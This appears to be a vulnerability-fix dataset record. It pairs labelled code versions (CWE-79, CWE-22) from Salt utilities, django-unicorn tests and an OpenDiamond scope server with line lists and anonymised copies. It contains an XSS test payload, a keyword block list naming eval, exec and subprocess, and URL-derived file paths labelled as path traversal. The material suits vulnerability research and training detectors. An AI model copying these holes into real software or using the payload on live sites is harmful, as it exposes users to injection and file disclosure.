                try:
                    VAR_54.makedirs(VAR_40)
                except OSError as VAR_49:
                    # an already-existing parent directory is fine
                    if VAR_49.errno != errno.EEXIST:
                        raise
            if not VAR_54.path.isfile(fn_):
                with salt.utils.fopen(fn_, 'w+') as fp_:
                    fp_.write('')
        except IOError as VAR_49:
            if VAR_54.path.isfile(VAR_40):
                VAR_32 = 'Failed to create VAR_11 {0}, is {1} a file?'.format(fn_, VAR_40)
                # BUG FIX: was `SaltSystemExit(VAR_32=msg)` -- `msg` is
                # undefined and the keyword was garbage, so this raised
                # NameError instead of the intended exception (same fix
                # applied to the two raises below).
                raise SaltSystemExit(msg=VAR_32)
            if VAR_49.errno != errno.EACCES:
                raise
            VAR_32 = 'No permissions to access "{0}", are you running as the correct VAR_6?'.format(fn_)
            raise SaltSystemExit(msg=VAR_32)
        except OSError as VAR_49:
            VAR_32 = 'Failed to create VAR_11 "{0}" - {1}'.format(fn_, VAR_49)
            raise SaltSystemExit(msg=VAR_32)
        # hand ownership of the file to VAR_6, leaving the group untouched
        VAR_41 = VAR_54.stat(fn_)
        if VAR_39 != VAR_41.st_uid:
            try:
                VAR_54.chown(fn_, VAR_39, -1)
            except OSError:
                pass
    return True
def FUNC_4(VAR_7, VAR_6, VAR_8=False, VAR_9='', VAR_10=False):
    """Ensure each directory in VAR_7 exists and is owned by user VAR_6.

    VAR_7  -- list of directory paths to verify/create
    VAR_6  -- user name that must own the directories
    VAR_8  -- permissive flag: tolerate foreign ownership when the group
              is one of VAR_6's groups
    VAR_9  -- the one directory that must additionally be restricted to
              mode 0o700 or 0o750 (presumably the pki dir -- confirm)
    VAR_10 -- when False, run the FUNC_0() sanity check afterwards
    On Windows this delegates to FUNC_13.
    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    -- confirm.
    """
    if salt.utils.is_windows():
        return FUNC_13(VAR_7, VAR_8, VAR_9, VAR_10)
    import pwd  # after confirming not running Windows
    try:
        VAR_38 = pwd.getpwnam(VAR_6)
        VAR_39 = VAR_38[2]
        VAR_42 = VAR_38[3]
        VAR_43 = salt.utils.get_gid_list(VAR_6, include_default=False)
    except KeyError:
        VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
                 '{0}. The VAR_6 is not available.\n').format(VAR_6)
        sys.stderr.write(VAR_49)
        sys.exit(salt.defaults.exitcodes.EX_NOUSER)
    for dir_ in VAR_7:
        if not dir_:
            continue
        if not VAR_54.path.isdir(dir_):
            try:
                # 18 == 0o022 (the old inline comment claimed 077, which
                # would be 63 -- the value, not the comment, matches the
                # usual "group/other read-only" umask)
                VAR_52 = VAR_54.umask(18)
                VAR_54.makedirs(dir_)
                # when running as root, hand the fresh dirs to VAR_6
                if VAR_54.getuid() == 0:
                    VAR_54.chown(dir_, VAR_39, VAR_42)
                VAR_54.umask(VAR_52)
            except OSError as VAR_49:
                VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
                sys.stderr.write(VAR_32.format(dir_, VAR_49))
                sys.exit(VAR_49.errno)
        VAR_44 = VAR_54.stat(dir_)
        if VAR_54.getuid() == 0:
            VAR_50 = VAR_54.stat(dir_)
            if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
                if VAR_8 and VAR_50.st_gid in VAR_43:
                    pass
                else:
                    VAR_54.chown(dir_, VAR_39, VAR_42)
            # recursively fix ownership below dir_, skipping the (large)
            # jobs cache
            for VAR_15 in [a for a in VAR_54.listdir(dir_) if 'jobs' not in a]:
                VAR_53 = VAR_54.path.join(dir_, VAR_15)
                if '{0}jobs'.format(VAR_54.path.sep) in VAR_53:
                    continue
                # fresh names here: the original shadowed the VAR_7/VAR_5
                # parameters with the os.walk results
                for walk_root, walk_dirs, walk_files in VAR_54.walk(VAR_53):
                    for name in walk_files:
                        if name.startswith('.'):
                            continue
                        VAR_11 = VAR_54.path.join(walk_root, name)
                        try:
                            VAR_50 = VAR_54.stat(VAR_11)
                        except (IOError, OSError):
                            # BUG FIX: previously `pass`, which fell
                            # through and re-used the stat result of the
                            # *previous* entry (or hit an unbound local
                            # on the first one); skip vanished files.
                            continue
                        if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
                            if VAR_8 and VAR_50.st_gid in VAR_43:
                                pass
                            else:
                                VAR_54.chown(VAR_11, VAR_39, VAR_42)
                    for name in walk_dirs:
                        VAR_11 = VAR_54.path.join(walk_root, name)
                        VAR_50 = VAR_54.stat(VAR_11)
                        if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
                            if VAR_8 and VAR_50.st_gid in VAR_43:
                                pass
                            else:
                                VAR_54.chown(VAR_11, VAR_39, VAR_42)
        if dir_ == VAR_9:
            # 448 == 0o700, 488 == 0o750: the only acceptable modes
            VAR_51 = stat.S_IMODE(VAR_44.st_mode)
            if VAR_51 != 448 and VAR_51 != 488:
                if VAR_54.access(dir_, VAR_54.W_OK):
                    VAR_54.chmod(dir_, 448)
                else:
                    VAR_32 = 'Unable to securely set the permissions of "{0}".'
                    # BUG FIX: was `msg.format(dir_)` -- `msg` is
                    # undefined here and raised NameError instead of
                    # logging the message.
                    VAR_32 = VAR_32.format(dir_)
                    if is_console_configured():
                        VAR_0.critical(VAR_32)
                    else:
                        sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
    if VAR_10 is False:
        FUNC_0()
def FUNC_5(VAR_6):
    """Drop privileges: switch the current process to run as user VAR_6.

    Returns True on success (or when already running as VAR_6, or on
    Windows), False when the user is unknown or the switch fails.
    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    -- confirm.
    """
    if salt.utils.is_windows():
        return True
    if VAR_6 == salt.utils.get_user():
        return True
    import pwd  # after confirming not running Windows
    try:
        VAR_45 = pwd.getpwnam(VAR_6)
        try:
            if hasattr(VAR_54, 'initgroups'):
                VAR_54.initgroups(VAR_6, VAR_45.pw_gid)  # pylint: disable=minimum-python-version
            else:
                VAR_54.setgroups(salt.utils.get_gid_list(VAR_6, include_default=False))
            VAR_54.setgid(VAR_45.pw_gid)
            VAR_54.setuid(VAR_45.pw_uid)
            # keep the environment consistent with the new identity
            if 'HOME' in VAR_54.environ:
                VAR_54.environ['HOME'] = VAR_45.pw_dir
            if 'SHELL' in VAR_54.environ:
                VAR_54.environ['SHELL'] = VAR_45.pw_shell
            for VAR_56 in ('USER', 'LOGNAME'):
                if VAR_56 in VAR_54.environ:
                    VAR_54.environ[VAR_56] = VAR_45.pw_name
        except OSError:
            VAR_32 = 'Salt configured to run as VAR_6 "{0}" but unable to switch.'
            # BUG FIX: was `msg.format(VAR_6)` -- `msg` is undefined here
            # and raised NameError instead of reporting the failure.
            VAR_32 = VAR_32.format(VAR_6)
            if is_console_configured():
                VAR_0.critical(VAR_32)
            else:
                sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
            return False
    except KeyError:
        VAR_32 = 'User not found: "{0}"'.format(VAR_6)
        if is_console_configured():
            VAR_0.critical(VAR_32)
        else:
            sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
        return False
    return True
def FUNC_6(VAR_11):
    """Return the list of ancestor paths of VAR_11 from the root down to
    VAR_11 itself, e.g. '/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c'].

    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    -- confirm.
    """
    VAR_25 = [VAR_11]
    (VAR_26, VAR_27) = VAR_54.path.split(VAR_11)
    if VAR_27 == '':
        # a trailing separator yields an empty tail; drop it and re-split
        VAR_25 = [VAR_26]
        (VAR_26, VAR_27) = VAR_54.path.split(VAR_26)
    # walk upward until splitting no longer changes the head
    while VAR_26 != VAR_25[0]:
        VAR_25.insert(0, VAR_26)
        # BUG FIX: the split results were previously assigned to an
        # unrelated name `head`, so VAR_26 never advanced and the
        # traversal stopped after inserting a single ancestor.  Assign
        # to VAR_26 so the walk reaches the filesystem root.
        (VAR_26, VAR_27) = VAR_54.path.split(VAR_26)
    return VAR_25
def FUNC_7(VAR_11, VAR_6='root', VAR_12=False):
    """Verify that every ancestor of VAR_11 is readable.

    On the first unreadable segment, either return silently (when
    VAR_12 is truthy) or raise SaltClientError with a hint about the
    likely cause.
    """
    for segment in FUNC_6(VAR_11):
        if VAR_54.access(segment, VAR_54.R_OK):
            continue
        problem = 'Could not access {0}.'.format(segment)
        if not VAR_54.path.exists(segment):
            problem += ' Path does not exist.'
        elif VAR_6 != salt.utils.get_user():
            problem += ' Try running as VAR_6 {0}.'.format(VAR_6)
        else:
            problem += ' Please give {0} read permissions.'.format(VAR_6)
        if VAR_12:
            return
        raise SaltClientError(problem)
def FUNC_8(VAR_13):
    """Log a warning when the number of accepted minion keys approaches
    this process's soft limit on open file descriptors.

    VAR_13 is the opts dict; reads 'max_open_files' and 'pki_dir'.
    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    -- confirm.
    """
    VAR_28 = VAR_13.get('max_open_files', 100000)
    # soft/hard fd limits for this process
    if sys.platform.startswith('win'):
        VAR_46 = VAR_47 = win32file._getmaxstdio()
    else:
        VAR_46, VAR_47 = resource.getrlimit(resource.RLIMIT_NOFILE)
    VAR_29 = VAR_54.path.join(VAR_13.get('pki_dir'), 'minions')
    VAR_30 = len(VAR_54.listdir(VAR_29))
    VAR_0.debug(
        'This salt-master instance has accepted {0} minion keys.'.format(
            VAR_30
        )
    )
    VAR_31 = logging.INFO
    # plenty of headroom -- nothing to report
    if (VAR_30 * 4) <= VAR_46:
        return
    VAR_32 = (
        'The number of accepted minion keys({0}) should be lower than 1/4 '
        'of the max open VAR_5 soft setting({1}). '.format(
            VAR_30, VAR_46
        )
    )
    # escalate severity as the key count approaches the soft limit
    if VAR_30 >= VAR_46:
        VAR_32 += 'salt-master will crash pretty soon! '
        VAR_31 = logging.CRITICAL
    elif (VAR_30 * 2) >= VAR_46:
        VAR_31 = logging.CRITICAL
    elif (VAR_30 * 3) >= VAR_46:
        VAR_31 = logging.WARNING
    elif (VAR_30 * 4) >= VAR_46:
        VAR_31 = logging.INFO
    if VAR_28 < VAR_47:
        VAR_32 += ('According to the system\'s hard limit, there\'s still a '
                   'margin of {0} to raise the salt\'s max_open_files '
                   'setting. ').format(VAR_47 - VAR_28)
    VAR_32 += 'Please consider raising this value.'
    # BUG FIX: was `VAR_0.log(VAR_31=level, VAR_32=msg)`, which referenced
    # the undefined names `level`/`msg` and used bogus keyword names;
    # Logger.log takes (level, msg) positionally.
    VAR_0.log(VAR_31, VAR_32)
def FUNC_9(VAR_14, VAR_11, VAR_15=False):
    """Return the normalized form of VAR_11 when it is contained in the
    absolute root VAR_14, otherwise ''.

    With VAR_15 truthy any path whose normalized form starts with
    VAR_14 is accepted; otherwise VAR_11 must be a direct child of
    VAR_14.
    """
    if not VAR_54.path.isabs(VAR_14):
        return ''
    if not VAR_54.path.isabs(VAR_11):
        VAR_11 = VAR_54.path.join(VAR_14, VAR_11)
    VAR_11 = VAR_54.path.normpath(VAR_11)
    if VAR_15:
        return VAR_11 if VAR_11.startswith(VAR_14) else ''
    if VAR_54.path.dirname(VAR_11) == VAR_54.path.normpath(VAR_14):
        return VAR_11
    return ''
def FUNC_10(VAR_13, VAR_16):
    """Return True when VAR_16 is a safe identifier: it contains no path
    separators or NUL bytes and resolves inside VAR_13['pki_dir']
    (checked via FUNC_9).  Any lookup/type error counts as invalid."""
    try:
        for forbidden in ('/', '\\', '\0'):
            if forbidden in VAR_16:
                return False
        return bool(FUNC_9(VAR_13['pki_dir'], VAR_16))
    except (AttributeError, KeyError, TypeError):
        return False
def FUNC_11(VAR_17):
    """Best-effort safety check for a code snippet VAR_17.

    Returns True only when none of the blacklisted tokens (imports,
    statement separators, exec/eval, file access, ...) occur in it.
    """
    VAR_33 = (
        'import',
        ';',
        'subprocess',
        'eval',
        'open',
        'file',
        'exec',
        'input')
    return not any(bad in VAR_17 for bad in VAR_33)
def FUNC_12(VAR_13):
    """Warn when the configured log level is more verbose than INFO,
    since such levels can write sensitive data to the logs."""
    configured = str(VAR_13.get('log_level')).lower()
    if LOG_LEVELS.get(configured, logging.NOTSET) < logging.INFO:
        VAR_0.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def FUNC_13(VAR_7, VAR_8=False, VAR_9='', VAR_10=False):
    """Windows counterpart of FUNC_4: create the directories in VAR_7
    and lock down their DACLs (owner Administrators S-1-5-32-544; full
    control only for Administrators, SYSTEM S-1-5-18 and OWNER RIGHTS
    S-1-3-4).

    VAR_8  -- permissive flag: skip tightening the root DACL
    VAR_9  -- directory that must always get the restrictive DACL
    VAR_10 -- when False, run the FUNC_0() sanity check afterwards
    NOTE(review): VAR_54 appears to be this module's alias for ``os``
    -- confirm.
    """
    import salt.utils.win_functions
    import salt.utils.win_dacl
    # walk up from the first path until the salt root directory is found
    VAR_11 = VAR_7[0]
    while VAR_54.path.basename(VAR_11) not in ['salt', 'salt-tests-tmpdir']:
        VAR_11, VAR_48 = VAR_54.path.split(VAR_11)
        if not VAR_48:
            # ROBUSTNESS FIX: reached the drive root without finding a
            # salt directory; os.path.split() of a root returns the root
            # unchanged, so this loop previously spun forever.
            break
    if not VAR_54.path.isdir(VAR_11):
        VAR_54.makedirs(VAR_11)
    VAR_34 = salt.utils.win_functions.get_current_user()
    if salt.utils.win_functions.is_admin(VAR_34):
        try:
            salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
        except CommandExecutionError:
            VAR_32 = 'Unable to securely set the owner of "{0}".'.format(VAR_11)
            if is_console_configured():
                VAR_0.critical(VAR_32)
            else:
                sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
        if not VAR_8:
            try:
                VAR_55 = salt.utils.win_dacl.dacl()
                VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.save(VAR_11, True)
            except CommandExecutionError:
                VAR_32 = 'Unable to securely set the permissions of ' \
                         '"{0}".'.format(VAR_11)
                if is_console_configured():
                    VAR_0.critical(VAR_32)
                else:
                    sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
    for dir_ in VAR_7:
        if not dir_:
            continue
        if not VAR_54.path.isdir(dir_):
            try:
                VAR_54.makedirs(dir_)
            except OSError as VAR_49:
                VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
                sys.stderr.write(VAR_32.format(dir_, VAR_49))
                sys.exit(VAR_49.errno)
        if dir_ == VAR_9:
            try:
                # NOTE(review): this sets the owner of VAR_11 (the salt
                # root) rather than dir_ -- looks suspicious, confirm
                # against the caller's intent before changing.
                salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
                VAR_55 = salt.utils.win_dacl.dacl()
                VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
                               'this_folder_subfolders_files')
                VAR_55.save(dir_, True)
            except CommandExecutionError:
                VAR_32 = 'Unable to securely set the permissions of "{0}".'
                # BUG FIX: was `msg.format(dir_)` -- `msg` is undefined
                # here and raised NameError instead of logging.
                VAR_32 = VAR_32.format(dir_)
                if is_console_configured():
                    VAR_0.critical(VAR_32)
                else:
                    sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
    if VAR_10 is False:
        FUNC_0()
| [
1,
6,
7,
8,
9,
17,
18,
23,
24,
31,
33,
34,
42,
45,
46,
48,
49,
57,
59,
64,
65,
68,
70,
82,
83,
94,
95,
101,
113,
114,
119,
140,
142,
143,
159,
172,
181,
185,
193,
194,
208,
221,
229,
231,
236,
237,
240,
259,
268,
270,
271,
272,
273,
274,
275,
276,
277,
278,
291,
293,
295,
296,
315,
316,
317,
320,
323,
327,
344,
345,
349,
353,
361,
365,
369,
370,
385,
386,
391,
392,
393,
394,
397,
398,
400,
401,
408,
409,
410,
414,
417,
423,
425,
427,
428,
429,
430,
431,
433,
440,
442,
446,
450,
453,
458,
461,
462,
481,
482,
490,
491,
500,
501,
521,
522,
528,
531,
532,
540,
541,
545,
546,
549,
550,
554,
555,
557,
564,
567,
569,
570,
571,
574,
577,
580,
581,
583,
591,
592,
603,
604,
607,
609,
610,
611,
613,
614,
615,
618,
621,
624,
625,
627,
635,
637,
639,
2,
3,
4,
36,
37,
38,
97,
98,
99,
100,
116,
117,
118,
145,
146,
147,
196,
197,
198,
199,
298,
299,
300,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
372,
373,
374,
375,
376,
377,
403,
404,
405,
464,
465,
466,
467,
468,
484,
485,
486,
493,
494,
495,
503,
504,
505,
506,
507,
524,
525,
526,
534,
535,
536,
537
] | [
1,
6,
7,
8,
9,
17,
18,
23,
24,
31,
33,
34,
42,
45,
46,
48,
49,
57,
59,
64,
65,
68,
70,
82,
83,
94,
95,
101,
113,
114,
119,
140,
142,
143,
159,
172,
181,
185,
193,
194,
208,
221,
229,
231,
236,
237,
240,
259,
268,
270,
271,
272,
273,
274,
275,
276,
277,
278,
291,
293,
295,
296,
315,
316,
317,
320,
323,
327,
344,
345,
349,
353,
361,
365,
369,
370,
385,
386,
391,
392,
393,
394,
397,
398,
400,
401,
408,
409,
410,
414,
417,
423,
425,
427,
428,
429,
430,
431,
433,
440,
442,
446,
450,
453,
458,
461,
462,
481,
482,
493,
494,
514,
515,
521,
524,
525,
533,
534,
538,
539,
542,
543,
547,
548,
550,
557,
560,
562,
563,
564,
567,
570,
573,
574,
576,
584,
585,
596,
597,
600,
602,
603,
604,
606,
607,
608,
611,
614,
617,
618,
620,
628,
630,
632,
2,
3,
4,
36,
37,
38,
97,
98,
99,
100,
116,
117,
118,
145,
146,
147,
196,
197,
198,
199,
298,
299,
300,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
372,
373,
374,
375,
376,
377,
403,
404,
405,
464,
465,
466,
467,
468,
484,
485,
486,
496,
497,
498,
499,
500,
517,
518,
519,
527,
528,
529,
530
] |
1CWE-79
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import get_root_element
def test_get_root_element():
expected = "<div>test</div>"
component_html = "<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_comment():
expected = "<div>test</div>"
component_html = "<!-- some comment --><div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_blank_string():
expected = "<div>test</div>"
component_html = "\n<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_no_element():
expected = "<div>test</div>"
component_html = "\n"
soup = BeautifulSoup(component_html, features="html.parser")
with pytest.raises(Exception):
actual = get_root_element(soup)
assert str(actual) == expected
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import (
UnicornTemplateResponse,
get_root_element,
)
def test_get_root_element():
expected = "<div>test</div>"
component_html = "<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_comment():
expected = "<div>test</div>"
component_html = "<!-- some comment --><div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_blank_string():
expected = "<div>test</div>"
component_html = "\n<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_no_element():
expected = "<div>test</div>"
component_html = "\n"
soup = BeautifulSoup(component_html, features="html.parser")
with pytest.raises(Exception):
actual = get_root_element(soup)
assert str(actual) == expected
def test_desoupify():
html = "<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\n</div>\n\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
expected = "<div><a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>!\n</div>\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
soup = BeautifulSoup(html, "html.parser")
actual = UnicornTemplateResponse._desoupify(soup)
assert expected == actual
| xss | {
"code": [
"from django_unicorn.components.unicorn_template_response import get_root_element"
],
"line_no": [
4
]
} | {
"code": [
"from django_unicorn.components.unicorn_template_response import (",
" get_root_element,",
")",
"def test_desoupify():",
" html = \"<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\\n</div>\\n\\n<script type=\\\"application/javascript\\\">\\n window.addEventListener('DOMContentLoaded', (event) => {\\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\\n });\\n</script>\"",
" expected = \"<div><a><style>@keyframes x{}</style><a style=\\\"animation-name:x\\\" onanimationend=\\\"alert(1)\\\"></a>!\\n</div>\\n<script type=\\\"application/javascript\\\">\\n window.addEventListener('DOMContentLoaded', (event) => {\\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\\n });\\n</script>\"",
" soup = BeautifulSoup(html, \"html.parser\")",
" actual = UnicornTemplateResponse._desoupify(soup)",
" assert expected == actual"
],
"line_no": [
4,
6,
7,
52,
53,
54,
56,
58,
60
]
} | import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import get_root_element
def FUNC_0():
VAR_0 = "<div>test</div>"
VAR_1 = "<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_1():
VAR_0 = "<div>test</div>"
VAR_1 = "<!-- some comment --><div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_2():
VAR_0 = "<div>test</div>"
VAR_1 = "\n<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_3():
VAR_0 = "<div>test</div>"
VAR_1 = "\n"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
with pytest.raises(Exception):
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import (
UnicornTemplateResponse,
get_root_element,
)
def FUNC_0():
VAR_0 = "<div>test</div>"
VAR_1 = "<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_1():
VAR_0 = "<div>test</div>"
VAR_1 = "<!-- some comment --><div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_2():
VAR_0 = "<div>test</div>"
VAR_1 = "\n<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_3():
VAR_0 = "<div>test</div>"
VAR_1 = "\n"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
with pytest.raises(Exception):
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_4():
VAR_4 = "<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\n</div>\n\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
VAR_0 = "<div><a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>!\n</div>\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
VAR_2 = BeautifulSoup(VAR_4, "html.parser")
VAR_3 = UnicornTemplateResponse._desoupify(VAR_2)
assert VAR_0 == VAR_3
| [
3,
5,
6,
9,
13,
15,
16,
19,
23,
25,
26,
29,
33,
35,
36,
39,
42,
45,
47
] | [
3,
8,
9,
12,
16,
18,
19,
22,
26,
28,
29,
32,
36,
38,
39,
42,
45,
48,
50,
51,
55,
57,
59,
61
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
BASEURL = 'cocktail'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = config.indexdir
DATAROOT = config.dataroot
scope_blueprint = Blueprint('mixer_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
print("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
print("Enter Scope")
sys.stdout.flush()
base_list = []
seed, percentage = decode_params(params)
if baseidx != "0":
base_index = _get_index_absolute_path('GIDIDX' + baseidx.upper())
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if limit > 0:
base_list = base_list[start:start+limit]
elif start > 0:
base_list = base_list[start:]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.0001
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
